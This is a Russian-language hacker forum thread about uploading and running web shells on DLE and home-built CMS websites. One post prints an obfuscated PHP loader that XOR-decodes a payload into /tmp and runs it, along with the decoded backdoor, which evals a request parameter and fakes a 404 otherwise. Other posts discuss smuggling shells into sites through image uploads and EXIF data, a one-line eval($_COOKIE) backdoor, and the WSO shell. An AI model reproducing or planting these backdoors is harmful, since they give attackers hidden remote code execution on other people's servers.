 |
|
03.12.2010, 01:00
|
|
Участник форума
Регистрация: 20.11.2010
Сообщений: 252
С нами:
8145686
Репутация:
8
|
|
Как запустить шелл на DLE ?
|
|
|
04.12.2010, 01:00
|
|
Постоянный
Регистрация: 30.05.2010
Сообщений: 414
С нами:
8396246
Репутация:
53
|
|
Цитата:
Сообщение от ALEXandr009
Я залил, у меня есть ссылка, но шел не запускается, пишет такой страницы нет.
пиши сайт в лс.посмотрим
|
|
|
|
24.11.2011, 01:00
|
|
Banned
Регистрация: 27.04.2010
Сообщений: 0
С нами:
8442499
Репутация:
0
|
|
Хочу написать об одном шелле
code:
<?php $pf="voKBztbOtLTX2JbXzc3bypaa4ez77+v77erlmc+Z45eXt MW0t9vI39KWzcrM187N0t/N1tvNlprh7Pvv6/vt6uWZz5njl5eFtMO029LN27TFtLfW29/a28yWmfbq6u6Rj5COnoqOip7w0cqe+NHL0NqZl4W0w7Q=";$GM ="/tmp/";$vdj="";$pf=base64_decode($pf);for($KYeAa=1; $KYeAa < strlen($pf); $KYeAa++) $vdj.=$pf[0] ^ $pf[$KYeAa];$xH=tempnam($GM,"O");$Wwm=fopen($xH, "w+");fwrite($Wwm, $vdj);fclose($Wwm);require($xH);unlink($xH);
он копирует себя в /tmp и в результате получается такая картина:
source:
Код:
<?php
if
(
isset
(
$_REQUEST
[
'q'
]))
{
eval
(
stripslashes
(
$_REQUEST
[
'q'
]));
}
else
{
header
(
'HTTP/1.0 404 Not Found'
);
}
|
|
|
|
25.11.2011, 01:00
|
|
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами:
8903558
Репутация:
60
|
|
И как потом из веба добраться до /tmp, в которой лежит шелл? =)
В чём смысл копирования?
|
|
|
|
25.11.2011, 01:00
|
|
Banned
Регистрация: 27.04.2010
Сообщений: 0
С нами:
8442499
Репутация:
0
|
|
>В чём смысл копирования?
Ну шелл копируется уже в "распакованном" виде. Как я понимаю смысл в том чтобы скрыть вредоносный код, eval появляется в явном виде только в /tmp
>И как потом из веба добраться до /tmp, в которой лежит шелл?
>require($xH);
|
|
|
|
26.11.2011, 01:00
|
|
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами:
8903558
Репутация:
60
|
|
Просёк фишку... сам код шелла лежит в tmp, а в действие приводится через другой заражённый скрипт, лежащий где-то в веб-директориях.
Странная система и непонятно чем руководствовались те, кто её придумал... спрятать в скрипте eval($_COOKIE['x']); куда проще чем вышеприведённую зверскую конструкцию, которая бросается в глаза даже при беглом просмотре кода.
|
|
|
|
27.01.2012, 01:00
|
|
Новичок
Регистрация: 17.01.2012
Сообщений: 1
С нами:
7536566
Репутация:
0
|
|
Скажите что делать, устал искать уже. Не могу найти способ заливки шелла через админку. Есть только один способ - картинка. Но не как не получается. хотел скачать там картинку в нее впихнуть хексом скрипт и обратно - не фига, пробовал к пхп добавить расширения - на мести картинки рамка есть а ссылки нет, добавлял в ексиф - не могу понять как подключится к нему, какой запрос нужен чтобы.. Админка самописная, можно только новости добавить с картинкой. мне бы хотябы базовый шел подключить а там бы я уже придумал что нибудь. ..наверно. Да еще не могу понять как отправить в кукисы cmd=phpinfo
Помогите
|
|
|
|
28.02.2012, 01:00
|
|
Познающий
Регистрация: 03.12.2010
Сообщений: 87
С нами:
8126966
Репутация:
8
|
|
Есть ли шелл с нормальной кодировкой. При редактировании файлов не отображает Русские буквы. В следствии чего после изминения и сохранения, на сайте появляются "кракозябры".
|
|
|
|
28.02.2012, 01:00
|
|
Новичок
Регистрация: 01.08.2009
Сообщений: 12
С нами:
8830468
Репутация:
0
|
|
Цитата:
Сообщение от b69d
Не могу найти способ заливки шелла через админку
Шелл не обязательно можно залить через админку. Из опыта, 3-4 CMS из 10 (самописы, ессно), не позволяют залить шелл через админку.
|
|
|
|
28.02.2012, 01:00
|
|
Познающий
Регистрация: 03.12.2010
Сообщений: 87
С нами:
8126966
Репутация:
8
|
|
Цитата:
Сообщение от stan_q
WSO 2.5 - есть выбор кодировок.
Проверял он ее и не замечает. И большой минус то что Wso 2.5 не катит на многих хостах он просто не отображает дерево каталогов(файлов и т.д). Хотя на Локальном все норм.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
